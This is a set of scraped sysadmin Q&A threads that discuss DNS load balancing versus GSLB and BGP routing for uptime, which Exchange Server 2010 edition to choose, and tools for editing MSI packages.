    The GSLB page of shame does raise some important points, which is why, personally I'd never willingly choose a GSLB to do the job of BGP routing.

    You should also look at the other points of failure in your network. Make sure all servers have 2 NICs (connected to 2 separate switches), 2 PSUs, and that your service is comprised of multiple backend servers, as redundant pairs, or load-balanced clusters.

    Basically, DNS "load balancing" via multiple A records is just "load-sharing" as the DNS server has no concept of how much load is on each server. This is cheap (free).

    A GSLB service has some concept of how loaded the servers are, and their availability, and provides some greater resistance to failure, but is still plagued by the problems related to dns caching, and pegging. This is less cheap, but slightly better.

    A BGP routed network, backed by a solid infrastructure, is IMHO, the only way to truly guarantee good uptime. You could save some money by using route servers instead of Cisco/Juniper/etc routers, but at the end of the day, you need to manage these servers very carefully indeed. This is by no means a cheap option, or something to be undertaken lightly, but it is a very rewarding solution, and brings you into the internet as a provider, rather than just a consumer.

    Paras Chopra : Thanks, I wanted to upvote your answer but couldn't because I am new. Well, yes BGP routed network seems to be the way to go but it can be fairly hard to setup and manage for a startup (both cost and man-power resources wise). I wish there were a cheaper solution for this but probably there isn't.
    Tom O'Connor : I'm going to write this up as an essay on my blog tonight, I think. The cheapest solution for the edge routers for you, would be a pair of Dell R200s each with a couple extra NICs, and a stack of RAM (4-6GB should be sufficient), then run something like FreeBSD and Quagga, or BIRD.
    Paras Chopra : Fantastic! I will be sure to check it up. Please update this thread with the link so that I don't miss it out.
    voretaq7 : +1 on the El-Cheapo router solution - We're actually running FreeBSD routers at my company with great results. If you want something a bit more commercial (but still way cheaper than comparable Cisco gear) Juniper Networks gear (www.juniper.net) might also be a good choice.
  • Actually, what you want could be upgraded to help your split testing activities as well if you combine geodns and dns failover.

    Sending group A to ip 1 and group B to ip 2, even if they were on the same server would let you separate your testing groups. Group A and Group B are from different geographical regions. To be fair, the next day/week/month, you flip the groups to make sure that you allow for geographic differences. Just to be rigourous in your methodology.

    The geodns/failover dns service at http://edgedirector.com can do this

    disclosure: i am associated with the above link, stumbled in here researching an article on applying stupid dns tricks to split testing.

    From spenser

need to implement exchnage server

actually i need to implement the Microsoft exchange server 2010 in my office for 20 email accounts.

which version i should prefer

Exchange Server 2010 Standard Edition Exchange Server 2010 Enterprise Edition

Thanks

ORCA MSI Editing

mornig All,

I am trying to edit an MSI package using ORCA, this is quite a good tool, but does any one know of any more good MSI editing tools?

Cheers

  • ORCA is "offical" but quite lacking in features. We use a collection of tools for our packaging needs. Some of these tool go far beyond just editing an MSI.

    1. Super ORCA
    2. WiX
    3. Advanced Installer
    4. Universal Extractor
    Cyper : Brillaint thanks for that. will gives these tools a try
    From jscott